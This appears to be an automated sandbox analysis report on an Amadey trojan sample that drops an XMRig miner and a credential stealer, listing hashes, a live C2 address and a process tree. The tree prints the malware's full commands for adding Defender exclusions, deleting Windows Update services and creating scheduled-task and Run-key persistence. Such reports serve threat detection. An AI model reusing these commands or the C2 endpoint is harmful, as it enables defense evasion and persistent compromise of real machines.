amadey | a41b4591c7351562ed9125da2c93db246e87e05198d2ec0951733d1919e119d8

Analysis

max time kernel
150s
max time network
147s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
06/03/2023, 03:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a41b4591c7351562ed9125da2c93db246e87e05198d2ec0951733d1919e119d8.exe
Size

249KB
MD5

08240e71429b32855b418a4acf0e38ec
SHA1

b180ace2ea6815775d29785c985b576dc21b76b5
SHA256

a41b4591c7351562ed9125da2c93db246e87e05198d2ec0951733d1919e119d8
SHA512

69fa8cae9bf69bcc498cfd7af08fcdfd299440ba0dd679835cc8ea14f07b0346f965f88350a5261f2312e046b0dd498b8453d647b5f023762e4265ffa47472bf
SSDEEP

6144:W9ynaiEzdOYqdjqqMth9iiry6Q2IbiiRWu1i5bDuPmyye:yWcmAh9ix2r1u1ile

Score

10^/10

amadey xmrig evasion miner spyware stealer trojan upx

Malware Config

Extracted

Family

amadey

Version

3.67

45.9.74.80/0bjdn2Z/index.php

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs

description	pid	Process	procid_target
PID 1324 created 1260	1324	XandETC.exe	17
PID 1324 created 1260	1324	XandETC.exe	17
PID 1324 created 1260	1324	XandETC.exe	17
PID 1324 created 1260	1324	XandETC.exe	17
PID 1324 created 1260	1324	XandETC.exe	17
PID 1484 created 1260	1484	updater.exe	17
PID 1484 created 1260	1484	updater.exe	17
PID 1484 created 1260	1484	updater.exe	17
PID 1484 created 1260	1484	updater.exe	17
PID 1484 created 1260	1484	updater.exe	17
PID 1860 created 1260	1860	conhost.exe	17
PID 1484 created 1260	1484	updater.exe	17
PID 1484 created 1260	1484	updater.exe	17

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 6 IoCs

miner

resource	yara_rule
behavioral1/memory/936-168-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/936-172-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/936-173-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/936-176-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/936-179-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig
behavioral1/memory/936-181-0x0000000140000000-0x00000001407F4000-memory.dmp	xmrig

Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Executes dropped EXE 5 IoCs

pid	Process
1100	mnolyk.exe
1324	XandETC.exe
1152	mnolyk.exe
1484	updater.exe
556	mnolyk.exe

Loads dropped DLL 13 IoCs

pid	Process
1856	a41b4591c7351562ed9125da2c93db246e87e05198d2ec0951733d1919e119d8.exe
1100	mnolyk.exe
1800	rundll32.exe
1800	rundll32.exe
1800	rundll32.exe
1800	rundll32.exe
1184	rundll32.exe
1184	rundll32.exe
1184	rundll32.exe
1184	rundll32.exe
588	WerFault.exe
588	WerFault.exe
1104	taskeng.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/936-168-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/936-172-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/936-173-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/936-176-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/936-179-0x0000000140000000-0x00000001407F4000-memory.dmp	upx
behavioral1/memory/936-181-0x0000000140000000-0x00000001407F4000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in System32 directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1484 set thread context of 1860	1484	updater.exe	98
PID 1484 set thread context of 936	1484	updater.exe	105

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Notepad\Chrome\updater.exe	XandETC.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
656	sc.exe
1136	sc.exe
1608	sc.exe
1920	sc.exe
1768	sc.exe
520	sc.exe
1804	sc.exe
828	sc.exe
916	sc.exe
324	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
588	1184	WerFault.exe	67

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1568	schtasks.exe
1724	schtasks.exe
1176	schtasks.exe

Modifies data under HKEY_USERS 7 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT\Certificates	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT\CRLs	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT\CTLs	conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = c00c47ede24fd901	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	conhost.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1324	XandETC.exe
1324	XandETC.exe
1088	powershell.exe
1324	XandETC.exe
1324	XandETC.exe
1324	XandETC.exe
1324	XandETC.exe
1324	XandETC.exe
1324	XandETC.exe
916	powershell.exe
1324	XandETC.exe
1324	XandETC.exe
1724	powershell.exe
1484	updater.exe
1484	updater.exe
1548	powershell.exe
1484	updater.exe
1484	updater.exe
1484	updater.exe
1484	updater.exe
1484	updater.exe
1484	updater.exe
1788	powershell.exe
1484	updater.exe
1484	updater.exe
1860	conhost.exe
1860	conhost.exe
1484	updater.exe
1484	updater.exe
1484	updater.exe
1484	updater.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe
936	conhost.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
460	Process not Found

Suspicious use of AdjustPrivilegeToken 38 IoCs

description	pid	Process
Token: SeDebugPrivilege	1088	powershell.exe
Token: SeShutdownPrivilege	1916	powercfg.exe
Token: SeShutdownPrivilege	1484	updater.exe
Token: SeDebugPrivilege	916	powershell.exe
Token: SeShutdownPrivilege	1232	powercfg.exe
Token: SeShutdownPrivilege	316	powercfg.exe
Token: SeDebugPrivilege	1724	powershell.exe
Token: SeDebugPrivilege	1548	powershell.exe
Token: SeShutdownPrivilege	300	powercfg.exe
Token: SeDebugPrivilege	1788	powershell.exe
Token: SeShutdownPrivilege	1204	powercfg.exe
Token: SeShutdownPrivilege	1740	powercfg.exe
Token: SeShutdownPrivilege	904	powercfg.exe
Token: SeAssignPrimaryTokenPrivilege	1376	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1376	WMIC.exe
Token: SeSecurityPrivilege	1376	WMIC.exe
Token: SeTakeOwnershipPrivilege	1376	WMIC.exe
Token: SeLoadDriverPrivilege	1376	WMIC.exe
Token: SeSystemtimePrivilege	1376	WMIC.exe
Token: SeBackupPrivilege	1376	WMIC.exe
Token: SeRestorePrivilege	1376	WMIC.exe
Token: SeShutdownPrivilege	1376	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1376	WMIC.exe
Token: SeUndockPrivilege	1376	WMIC.exe
Token: SeManageVolumePrivilege	1376	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1376	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1376	WMIC.exe
Token: SeSecurityPrivilege	1376	WMIC.exe
Token: SeTakeOwnershipPrivilege	1376	WMIC.exe
Token: SeLoadDriverPrivilege	1376	WMIC.exe
Token: SeSystemtimePrivilege	1376	WMIC.exe
Token: SeBackupPrivilege	1376	WMIC.exe
Token: SeRestorePrivilege	1376	WMIC.exe
Token: SeShutdownPrivilege	1376	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1376	WMIC.exe
Token: SeUndockPrivilege	1376	WMIC.exe
Token: SeManageVolumePrivilege	1376	WMIC.exe
Token: SeLockMemoryPrivilege	936	conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1856 wrote to memory of 1100	1856	a41b4591c7351562ed9125da2c93db246e87e05198d2ec0951733d1919e119d8.exe	27
PID 1856 wrote to memory of 1100	1856	a41b4591c7351562ed9125da2c93db246e87e05198d2ec0951733d1919e119d8.exe	27
PID 1856 wrote to memory of 1100	1856	a41b4591c7351562ed9125da2c93db246e87e05198d2ec0951733d1919e119d8.exe	27
PID 1856 wrote to memory of 1100	1856	a41b4591c7351562ed9125da2c93db246e87e05198d2ec0951733d1919e119d8.exe	27
PID 1100 wrote to memory of 1176	1100	mnolyk.exe	28
PID 1100 wrote to memory of 1176	1100	mnolyk.exe	28
PID 1100 wrote to memory of 1176	1100	mnolyk.exe	28
PID 1100 wrote to memory of 1176	1100	mnolyk.exe	28
PID 1100 wrote to memory of 688	1100	mnolyk.exe	30
PID 1100 wrote to memory of 688	1100	mnolyk.exe	30
PID 1100 wrote to memory of 688	1100	mnolyk.exe	30
PID 1100 wrote to memory of 688	1100	mnolyk.exe	30
PID 688 wrote to memory of 1732	688	cmd.exe	32
PID 688 wrote to memory of 1732	688	cmd.exe	32
PID 688 wrote to memory of 1732	688	cmd.exe	32
PID 688 wrote to memory of 1732	688	cmd.exe	32
PID 688 wrote to memory of 1740	688	cmd.exe	33
PID 688 wrote to memory of 1740	688	cmd.exe	33
PID 688 wrote to memory of 1740	688	cmd.exe	33
PID 688 wrote to memory of 1740	688	cmd.exe	33
PID 688 wrote to memory of 1140	688	cmd.exe	34
PID 688 wrote to memory of 1140	688	cmd.exe	34
PID 688 wrote to memory of 1140	688	cmd.exe	34
PID 688 wrote to memory of 1140	688	cmd.exe	34
PID 688 wrote to memory of 1076	688	cmd.exe	35
PID 688 wrote to memory of 1076	688	cmd.exe	35
PID 688 wrote to memory of 1076	688	cmd.exe	35
PID 688 wrote to memory of 1076	688	cmd.exe	35
PID 688 wrote to memory of 1104	688	cmd.exe	36
PID 688 wrote to memory of 1104	688	cmd.exe	36
PID 688 wrote to memory of 1104	688	cmd.exe	36
PID 688 wrote to memory of 1104	688	cmd.exe	36
PID 688 wrote to memory of 1040	688	cmd.exe	37
PID 688 wrote to memory of 1040	688	cmd.exe	37
PID 688 wrote to memory of 1040	688	cmd.exe	37
PID 688 wrote to memory of 1040	688	cmd.exe	37
PID 1100 wrote to memory of 1324	1100	mnolyk.exe	40
PID 1100 wrote to memory of 1324	1100	mnolyk.exe	40
PID 1100 wrote to memory of 1324	1100	mnolyk.exe	40
PID 1100 wrote to memory of 1324	1100	mnolyk.exe	40
PID 1808 wrote to memory of 1152	1808	taskeng.exe	42
PID 1808 wrote to memory of 1152	1808	taskeng.exe	42
PID 1808 wrote to memory of 1152	1808	taskeng.exe	42
PID 1808 wrote to memory of 1152	1808	taskeng.exe	42
PID 1704 wrote to memory of 520	1704	cmd.exe	51
PID 1704 wrote to memory of 520	1704	cmd.exe	51
PID 1704 wrote to memory of 520	1704	cmd.exe	51
PID 1704 wrote to memory of 1804	1704	cmd.exe	52
PID 1704 wrote to memory of 1804	1704	cmd.exe	52
PID 1704 wrote to memory of 1804	1704	cmd.exe	52
PID 1148 wrote to memory of 1916	1148	cmd.exe	53
PID 1148 wrote to memory of 1916	1148	cmd.exe	53
PID 1148 wrote to memory of 1916	1148	cmd.exe	53
PID 1704 wrote to memory of 828	1704	cmd.exe	54
PID 1704 wrote to memory of 828	1704	cmd.exe	54
PID 1704 wrote to memory of 828	1704	cmd.exe	54
PID 1148 wrote to memory of 1484	1148	cmd.exe	73
PID 1148 wrote to memory of 1484	1148	cmd.exe	73
PID 1148 wrote to memory of 1484	1148	cmd.exe	73
PID 1704 wrote to memory of 656	1704	cmd.exe	56
PID 1704 wrote to memory of 656	1704	cmd.exe	56
PID 1704 wrote to memory of 656	1704	cmd.exe	56
PID 1704 wrote to memory of 1136	1704	cmd.exe	58
PID 1704 wrote to memory of 1136	1704	cmd.exe	58

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1260
- C:\Users\Admin\AppData\Local\Temp\a41b4591c7351562ed9125da2c93db246e87e05198d2ec0951733d1919e119d8.exe
  "C:\Users\Admin\AppData\Local\Temp\a41b4591c7351562ed9125da2c93db246e87e05198d2ec0951733d1919e119d8.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1856
- - C:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exe
    "C:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1100
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exe" /F
      4⤵
      Creates scheduled task(s)
      PID:1176
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "Admin:N"&&CACLS "mnolyk.exe" /P "Admin:R" /E&&echo Y|CACLS "..\6d73a97b0c" /P "Admin:N"&&CACLS "..\6d73a97b0c" /P "Admin:R" /E&&Exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:688
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        
        PID:1732
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "mnolyk.exe" /P "Admin:N"
        5⤵
        
        PID:1740
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "mnolyk.exe" /P "Admin:R" /E
        5⤵
        
        PID:1140
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        
        PID:1076
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\6d73a97b0c" /P "Admin:N"
        5⤵
        
        PID:1104
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\6d73a97b0c" /P "Admin:R" /E
        5⤵
        
        PID:1040
  - - C:\Users\Admin\AppData\Local\Temp\1000010001\XandETC.exe
      "C:\Users\Admin\AppData\Local\Temp\1000010001\XandETC.exe"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Executes dropped EXE
      Drops file in Program Files directory
      Suspicious behavior: EnumeratesProcesses
      PID:1324
  - - C:\Windows\SysWOW64\rundll32.exe
      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main
      4⤵
      Loads dropped DLL
      PID:1800
    - - C:\Windows\system32\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main
        5⤵
        Loads dropped DLL
        
        PID:1184
      - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 1184 -s 320
        6⤵
        Loads dropped DLL
        Program crash
        
        PID:588
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1088
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:916
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn NoteUpdateTaskMachineQC /tr "'C:\Program Files\Notepad\Chrome\updater.exe'"
    3⤵
    - Creates scheduled task(s)
    PID:1568
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1148
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1916
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:1484
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1232
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:316
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1704
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:520
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:1804
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:828
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:656
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:1136
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:1188
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:1428
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    - Modifies security service
    PID:1356
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:616
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:1796
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1724
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC
    3⤵
    PID:1320
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1548
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  PID:1384
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1608
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:1920
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:916
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:1768
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:324
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:984
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:928
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    PID:1600
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:1744
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:1492
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:1568
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:300
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1204
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1740
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:904
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
  2⤵
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1788
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn NoteUpdateTaskMachineQC /tr "'C:\Program Files\Notepad\Chrome\updater.exe'"
    3⤵
    - Creates scheduled task(s)
    PID:1724
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe zuhwtyqtfkk
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Suspicious behavior: EnumeratesProcesses
  PID:1860
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  - Drops file in Program Files directory
  PID:1380
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic PATH Win32_VideoController GET Name, VideoProcessor
    3⤵
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
    PID:1376
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  - Drops file in Program Files directory
  PID:1776
- C:\Windows\System32\conhost.exe
